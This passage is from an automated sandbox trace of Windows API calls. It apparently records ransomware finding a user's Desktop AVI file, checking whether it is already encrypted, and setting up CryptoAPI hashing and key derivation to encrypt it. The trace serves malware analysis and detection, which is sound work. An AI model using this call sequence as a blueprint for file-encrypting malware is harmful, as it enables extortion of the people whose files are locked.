cAlternateFileName="YMGNXT~1.AVI")) returned 0x7c20c0 [0032.368] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.368] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.368] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.369] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.369] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.369] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zuxz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.369] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.369] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.369] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.369] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.369] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.369] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.369] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.369] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.369] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x9efc70e0, ftLastWriteTime.dwHighDateTime=0x1d5c21a, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0x7c20c0 [0032.370] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x9efc70e0, ftLastWriteTime.dwHighDateTime=0x1d5c21a, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0x7c20c0 [0032.370] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZUXz.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.371] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.371] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.371] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.372] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.372] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x9efc70e0, ftLastWriteTime.dwHighDateTime=0x1d5c21a, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0x7c2240 [0032.372] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.372] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.372] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.372] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.372] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.373] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.373] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.373] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.373] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.374] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.374] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.374] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.374] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.374] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.375] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.375] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.375] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.375] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] CharUpperBuffW 